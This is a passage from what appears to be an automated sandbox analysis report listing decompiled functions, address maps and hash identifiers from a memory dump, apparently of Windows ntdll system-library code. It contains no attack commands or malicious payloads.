				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E010E9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E0116A80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E0116A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E01171293(_t79, _v40, E011707DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E010C7D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E0116138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

















                                          0x011705c5
                                          0x011705ca
                                          0x011705d3
                                          0x011706db
                                          0x011706db
                                          0x011706dd
                                          0x011706e3
                                          0x011706e3
                                          0x011705dd
                                          0x011705e7
                                          0x011705f6
                                          0x01170600
                                          0x01170607
                                          0x01170610
                                          0x01170615
                                          0x0117061a
                                          0x0117061c
                                          0x0117061e
                                          0x01170624
                                          0x01170625
                                          0x01170627
                                          0x01170628
                                          0x01170631
                                          0x01170640
                                          0x0117064d
                                          0x01170654
                                          0x01170654
                                          0x01170631
                                          0x0117066d
                                          0x01170674
                                          0x00000000
                                          0x00000000
                                          0x01170692
                                          0x0117069e
                                          0x011706b0
                                          0x011706a0
                                          0x011706a9
                                          0x011706a9
                                          0x011706b8
                                          0x011706d6
                                          0x011706d6
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: `
                                          • API String ID: 0-2679148245
                                          • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                          • Instruction ID: 0ce0929ac78f0295a66c0e2e3c3889df27a6f5ba3b019f1e953c33972af73ce5
                                          • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                          • Instruction Fuzzy Hash: F93104322043066BE714DE28CC44F9B7BE9EBC8754F144229FA54EB380D770E954CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01123884 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 72%
                                          			E01123884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E010E9650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L010C4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E010E9650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}















                                          0x01123893
                                          0x01123896
                                          0x01123899
                                          0x0112389f
                                          0x011238a0
                                          0x011238a4
                                          0x011238a9
                                          0x011238ac
                                          0x011238ad
                                          0x011238ae
                                          0x011238af
                                          0x011238b1
                                          0x011238b4
                                          0x011238bb
                                          0x011238bc
                                          0x011238bd
                                          0x011238c4
                                          0x011238c8
                                          0x011238ca
                                          0x011238ca
                                          0x011238d5
                                          0x0112393e
                                          0x01123940
                                          0x01123942
                                          0x01123952
                                          0x01123954
                                          0x01123961
                                          0x01123961
                                          0x01123967
                                          0x0112396e
                                          0x0112396e
                                          0x01123947
                                          0x0112394c
                                          0x00000000
                                          0x0112394c
                                          0x011238ea
                                          0x011238ee
                                          0x011238f8
                                          0x011238f9
                                          0x011238ff
                                          0x01123900
                                          0x01123902
                                          0x01123903
                                          0x0112390b
                                          0x0112390f
                                          0x01123950
                                          0x00000000
                                          0x01123950
                                          0x01123915
                                          0x0112391d
                                          0x0112391d
                                          0x01123922
                                          0x01123926
                                          0x00000000
                                          0x01123928
                                          0x0112392b
                                          0x0112392b
                                          0x01123935
                                          0x01123937
                                          0x01123937
                                          0x00000000
                                          0x01123935
                                          0x01123926
                                          0x011238f0
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: BinaryName
                                          • API String ID: 0-215506332
                                          • Opcode ID: f6b382b0d2a6d432d0a822457aef9376061537434cbc6d7dfd7dc5132118bbc6
                                          • Instruction ID: 7ed2d93828443d6966ebc7eb4b32bf86a11aae51f81d82053e138fc1ef9a7868
                                          • Opcode Fuzzy Hash: f6b382b0d2a6d432d0a822457aef9376061537434cbc6d7dfd7dc5132118bbc6
                                          • Instruction Fuzzy Hash: F8312972E1052AAFDF19DB5CC945EBFB774FB49B20F014129E964A7280E7349E10CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010DD294 Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 33%
                                          			E010DD294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x119d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E010C4120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E010EB640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E010E98D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E010E95D0();
					L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

































                                          0x010dd29c
                                          0x010dd2a6
                                          0x010dd2b1
                                          0x010dd2b5
                                          0x010dd2b6
                                          0x010dd2bc
                                          0x010dd2bd
                                          0x010dd2be
                                          0x010dd2bf
                                          0x010dd2c2
                                          0x010dd2c4
                                          0x010dd2cc
                                          0x010dd384
                                          0x010dd34b
                                          0x010dd34f
                                          0x010dd350
                                          0x010dd351
                                          0x010dd35c
                                          0x010dd35c
                                          0x010dd2d6
                                          0x010dd2da
                                          0x010dd2e1
                                          0x010dd361
                                          0x010dd369
                                          0x010dd36d
                                          0x010dd2e3
                                          0x010dd2e3
                                          0x010dd2e3
                                          0x010dd2e5
                                          0x010dd2ed
                                          0x010dd2f5
                                          0x010dd2fa
                                          0x010dd302
                                          0x010dd303
                                          0x010dd30b
                                          0x010dd30f
                                          0x010dd313
                                          0x010dd318
                                          0x010dd31c
                                          0x010dd320
                                          0x010dd379
                                          0x010dd37d
                                          0x00000000
                                          0x00000000
                                          0x0111affe
                                          0x0111b001
                                          0x0111b011
                                          0x00000000
                                          0x010dd322
                                          0x010dd322
                                          0x010dd330
                                          0x010dd337
                                          0x010dd35d
                                          0x010dd339
                                          0x010dd33f
                                          0x010dd38c
                                          0x010dd38c
                                          0x010dd33f
                                          0x010dd349
                                          0x00000000
                                          0x010dd349

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @
                                          • API String ID: 0-2766056989
                                          • Opcode ID: c000cdaf14d1f22c13811464d36741da5ae0f57c04d0af81a8ae1321744d58f5
                                          • Instruction ID: 2bd4627fcffbcf5651b6920370a1b832495f0349e74bae29d780ba99079a5648
                                          • Opcode Fuzzy Hash: c000cdaf14d1f22c13811464d36741da5ae0f57c04d0af81a8ae1321744d58f5
                                          • Instruction Fuzzy Hash: C1319FB2508305AFC761DF68C9849AFBBE8FB99754F40492EF9D483290DA35DD04CB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010B1B8F Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 72%
                                          			E010B1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E010EBB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E010EA9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E010EA9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L010C4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}









                                          0x010b1b8f
                                          0x010b1b9a
                                          0x010b1b9c
                                          0x010b1b9e
                                          0x010b1ba3
                                          0x01107010
                                          0x01107010
                                          0x00000000
                                          0x010b1ba9
                                          0x010b1ba9
                                          0x010b1bae
                                          0x00000000
                                          0x010b1bc5
                                          0x010b1bca
                                          0x010b1bcf
                                          0x010b1bd0
                                          0x010b1bd1
                                          0x010b1bd2
                                          0x010b1bd6
                                          0x010b1bdc
                                          0x010b1be0
                                          0x01106ffc
                                          0x01107000
                                          0x00000000
                                          0x01107006
                                          0x01107009
                                          0x01107009
                                          0x010b1be6
                                          0x010b1bec
                                          0x010b1c0b
                                          0x010b1c0b
                                          0x010b1c0c
                                          0x010b1c11
                                          0x010b1c12
                                          0x010b1c15
                                          0x010b1c1b
                                          0x010b1c1f
                                          0x010b1c31
                                          0x010b1c33
                                          0x01107026
                                          0x01107026
                                          0x010b1c21
                                          0x010b1c24
                                          0x010b1c24
                                          0x010b1bee
                                          0x010b1bee
                                          0x010b1bf2
                                          0x010b1c3a
                                          0x010b1bf4
                                          0x010b1bf4
                                          0x010b1c05
                                          0x010b1c05
                                          0x010b1c09
                                          0x010b1c3e
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x010b1c09
                                          0x010b1bec
                                          0x010b1be0
                                          0x010b1bae
                                          0x010b1c2e

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: WindowsExcludedProcs
                                          • API String ID: 0-3583428290
                                          • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                          • Instruction ID: 43e641f93f00e774d78f3b25b24300d4f59df4b040b36f5879c3699f5c8d23c8
                                          • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                          • Instruction Fuzzy Hash: C021F836A0111DEBDB22DA59A894FDF7BADAF45A50F064565FA948B244D730DC00C7E0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010CF716 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E010CF716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}











                                          0x010cf71d
                                          0x010cf722
                                          0x010cf726
                                          0x01114770
                                          0x010cf765
                                          0x010cf769
                                          0x010cf769
                                          0x010cf732
                                          0x0111477a
                                          0x00000000
                                          0x0111477a
                                          0x010cf738
                                          0x010cf73a
                                          0x010cf73c
                                          0x010cf73f
                                          0x010cf746
                                          0x010cf778
                                          0x010cf7a9
                                          0x010cf7a9
                                          0x010cf754
                                          0x010cf75a
                                          0x010cf75d
                                          0x010cf75f
                                          0x010cf761
                                          0x010cf76f
                                          0x010cf771
                                          0x010cf771
                                          0x010cf76f
                                          0x010cf763
                                          0x00000000
                                          0x010cf763
                                          0x010cf77d
                                          0x010cf7a3
                                          0x010cf7a5
                                          0x00000000
                                          0x010cf7a5
                                          0x010cf77f
                                          0x010cf782
                                          0x010cf784
                                          0x010cf786
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x010cf788
                                          0x010cf748
                                          0x010cf74d
                                          0x010cf78d
                                          0x010cf793
                                          0x010cf7b7
                                          0x010cf7bc
                                          0x00000000
                                          0x010cf7bc
                                          0x010cf798
                                          0x00000000
                                          0x00000000
                                          0x010cf79d
                                          0x010cf7b0
                                          0x00000000
                                          0x010cf7b0
                                          0x010cf79f
                                          0x00000000
                                          0x010cf74f
                                          0x010cf74f
                                          0x00000000
                                          0x010cf74f

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Actx
                                          • API String ID: 0-89312691
                                          • Opcode ID: 4bdb4db88ce8515719b5ffeb718d830b50b8b89b4f8e950b0ef86db24c218335
                                          • Instruction ID: 375f5a1ff913bf910a5c8fcbc73090d7a1945301433668863fd0f54783544716
                                          • Opcode Fuzzy Hash: 4bdb4db88ce8515719b5ffeb718d830b50b8b89b4f8e950b0ef86db24c218335
                                          • Instruction Fuzzy Hash: D7117C35304A038BEB694F1D889462E76D7BB85E64F24476EE5E1CB791DB60C8418B42
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01158DF1 Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 71%
                                          			E01158DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x1180d50);
				E010FD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E01135720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L010FDEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L010FDEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E010FD130(_t34, _t39, _t40);
			}





                                          0x01158df1
                                          0x01158df1
                                          0x01158df1
                                          0x01158df1
                                          0x01158df1
                                          0x01158df1
                                          0x01158df3
                                          0x01158df8
                                          0x01158dfd
                                          0x01158e00
                                          0x01158e0e
                                          0x01158e2a
                                          0x01158e36
                                          0x01158e38
                                          0x01158e3c
                                          0x01158e46
                                          0x01158e46
                                          0x01158e36
                                          0x01158e50
                                          0x01158e56
                                          0x01158e59
                                          0x01158e5c
                                          0x01158e60
                                          0x01158e67
                                          0x01158e6d
                                          0x01158e73
                                          0x01158e74
                                          0x01158eb1
                                          0x01158ebd

                                          Strings
                                          • Critical error detected %lx, xrefs: 01158E21
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Critical error detected %lx
                                          • API String ID: 0-802127002
                                          • Opcode ID: 694b66a05fe8a13a9a60bae20e2388f3097320b39f092f2e4df19c885548c9ee
                                          • Instruction ID: f339370d2c8cf809f91f9503406526cd0f0df8933a3cd6fad678113400aa7ff3
                                          • Opcode Fuzzy Hash: 694b66a05fe8a13a9a60bae20e2388f3097320b39f092f2e4df19c885548c9ee
                                          • Instruction Fuzzy Hash: 72115B71D54348DADF29DFA985067DCBBB0FB14314F20425DE5696B292C3340601DF14
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0113FF10 Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                          Download Yara Rule
                                          Strings
                                          • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0113FF60
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                          • API String ID: 0-1911121157
                                          • Opcode ID: 3da23a91839fd3fd682fe2095256bf12f939ac9f026d722c26b88ebf035dc8d3
                                          • Instruction ID: f84fccdc736e74656ffbad2b423a9514795b36de67bd0a5e20ae9086b4a39bca
                                          • Opcode Fuzzy Hash: 3da23a91839fd3fd682fe2095256bf12f939ac9f026d722c26b88ebf035dc8d3
                                          • Instruction Fuzzy Hash: 83116672910145EFDF2AEF54C849FD87BB1FF48704F108058F6086B1A0C7389944DB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01175BA5 Relevance: .6, Instructions: 592COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 88%
                                          			E01175BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x1181178);
				E010FD0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E01174C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E010ED000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E01175542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x11960e8;
								if( *0x11960e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x11960e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E010E9710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
